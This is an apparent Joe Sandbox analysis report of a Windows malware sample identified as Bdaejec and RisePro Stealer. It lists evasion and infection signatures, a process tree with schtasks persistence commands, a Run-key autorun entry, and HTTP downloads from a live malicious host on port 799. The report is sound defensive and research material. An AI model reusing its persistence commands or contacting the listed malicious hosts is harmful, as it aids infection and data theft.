Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hunta[1].exe

Overview

General Information

Sample name:hunta[1].exe
Analysis ID:1480972
MD5:651de10cfaaa78be50eda9f3f0ce9ea7
SHA1:6b922567fc5880e38fc9a3eacc24f6bab3785731
SHA256:e5cb4f3f8d41c28116b9ff3253ab5f6d6736e18da2d225cf15379954b2751643
Tags:exe
Infos:

Detection

Bdaejec, RisePro Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Bdaejec
Yara detected RisePro Stealer
AI detected suspicious sample
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • hunta[1].exe (PID: 7416 cmdline: "C:\Users\user\Desktop\hunta[1].exe" MD5: 651DE10CFAAA78BE50EDA9F3F0CE9EA7)
    • WwKLWFk.exe (PID: 7456 cmdline: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • WerFault.exe (PID: 2968 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7456 -s 1640 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • schtasks.exe (PID: 8000 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 8048 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MPGPH131.exe (PID: 8104 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 651DE10CFAAA78BE50EDA9F3F0CE9EA7)
  • MPGPH131.exe (PID: 8124 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 651DE10CFAAA78BE50EDA9F3F0CE9EA7)
  • RageMP131.exe (PID: 5640 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: 651DE10CFAAA78BE50EDA9F3F0CE9EA7)
    • WwKLWFk.exe (PID: 1836 cmdline: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • cmd.exe (PID: 3964 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\149657b0.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • RageMP131.exe (PID: 4228 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: 651DE10CFAAA78BE50EDA9F3F0CE9EA7)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
    00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
      00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
        0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
          0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
            Click to see the 12 entries

            System Summary

            barindex
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\hunta[1].exe, ProcessId: 7416, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131
            No Snort rule has matched
            Timestamp:2024-07-25T02:17:03.940751+0200
            SID:2046269
            Source Port:49725
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T02:16:43.753403+0200
            SID:2028371
            Source Port:49718
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-07-25T02:16:37.270173+0200
            SID:2807908
            Source Port:49710
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T02:16:43.236158+0200
            SID:2046269
            Source Port:49713
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T02:16:30.189325+0200
            SID:2838522
            Source Port:59684
            Destination Port:53
            Protocol:UDP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T02:16:56.571937+0200
            SID:2807908
            Source Port:49723
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T02:16:53.692444+0200
            SID:2807908
            Source Port:49721
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T02:16:34.626885+0200
            SID:2049060
            Source Port:49709
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T02:16:57.861221+0200
            SID:2046269
            Source Port:49722
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T02:16:43.267413+0200
            SID:2046269
            Source Port:49714
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T02:16:34.027382+0200
            SID:2807908
            Source Port:49708
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T02:16:40.273973+0200
            SID:2049060
            Source Port:49713
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T02:17:00.839786+0200
            SID:2807908
            Source Port:49724
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T02:17:03.563869+0200
            SID:2807908
            Source Port:49726
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T02:16:50.770303+0200
            SID:2807908
            Source Port:49720
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T02:16:37.631540+0200
            SID:2046269
            Source Port:49709
            Destination Port:50500
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T02:17:24.819852+0200
            SID:2022930
            Source Port:443
            Destination Port:49727
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T02:16:30.743771+0200
            SID:2807908
            Source Port:49707
            Destination Port:799
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-25T02:16:47.540655+0200
            SID:2022930
            Source Port:443
            Destination Port:49719
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: hunta[1].exeAvira: detected
            Source: http://ddos.dnsnb8.net:799/cj//k2.rarURL Reputation: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k3.rarsAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k1.rarAAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net/URL Reputation: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k3.rarAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k1.rarppDataAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k1.rarURL Reputation: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k3.rar2OneDrive=C:Avira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k2.rarlAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k2.rar1Avira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k1.rarVAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k5.rarAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net/OAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k2.rar8Avira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net/dAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k3.rar5Avira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k5.rarC:Avira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k4.rarAvira URL Cloud: Label: malware
            Source: http://ddos.dnsnb8.net:799/cj//k1.rarcC:Avira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k1.rarcAvira URL Cloud: Label: phishing
            Source: http://ddos.dnsnb8.net:799/cj//k2.rarfC:Avira URL Cloud: Label: phishing
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
            Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeAvira: detection malicious, Label: W32/Jadtre.B
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeAvira: detection malicious, Label: W32/Jadtre.B
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeReversingLabs: Detection: 94%
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeReversingLabs: Detection: 94%
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeReversingLabs: Detection: 92%
            Source: hunta[1].exeReversingLabs: Detection: 94%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
            Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeJoe Sandbox ML: detected
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeJoe Sandbox ML: detected
            Source: hunta[1].exeJoe Sandbox ML: detected
            Source: hunta[1].exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.4.dr

            Spreading

            barindex
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 4_2_002129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,4_2_002129E2
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 22_2_00B529E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,22_2_00B529E2
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 4_2_00212B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,4_2_00212B8C
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

            Networking

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 799
            Source: global trafficTCP traffic: 192.168.2.10:49707 -> 44.221.84.105:799
            Source: global trafficTCP traffic: 192.168.2.10:49709 -> 193.233.132.62:50500
            Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
            Source: Joe Sandbox ViewIP Address: 193.233.132.62 193.233.132.62
            Source: Joe Sandbox ViewIP Address: 193.233.132.62 193.233.132.62
            Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.62
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_00E9DB60 recv,WSAStartup,closesocket,socket,connect,closesocket,2_2_00E9DB60
            Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
            Source: WwKLWFk.exe, 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmp, WwKLWFk.exe, 00000004.00000003.1268128954.0000000000DF0000.00000004.00001000.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000003.1466940967.0000000000980000.00000004.00001000.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
            Source: WwKLWFk.exe, 00000004.00000003.1288946208.0000000001188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/
            Source: WwKLWFk.exe, 00000004.00000003.1288946208.0000000001188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/O
            Source: WwKLWFk.exe, 00000004.00000003.1288946208.0000000001188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/d
            Source: WwKLWFk.exe, 00000016.00000003.1487791068.0000000000A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
            Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A18000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarA
            Source: WwKLWFk.exe, 00000004.00000003.1288946208.00000000011CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarV
            Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000003.1487791068.0000000000A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarc
            Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcC:
            Source: WwKLWFk.exe, 00000004.00000003.1288946208.00000000011CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarppData
            Source: WwKLWFk.exe, 00000004.00000002.1418971368.000000000116E000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
            Source: WwKLWFk.exe, 00000004.00000002.1418971368.000000000116E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar1
            Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar8
            Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarfC:
            Source: WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarl
            Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
            Source: WwKLWFk.exe, 00000004.00000002.1418971368.0000000001210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar2OneDrive=C:
            Source: WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar5
            Source: WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rars
            Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
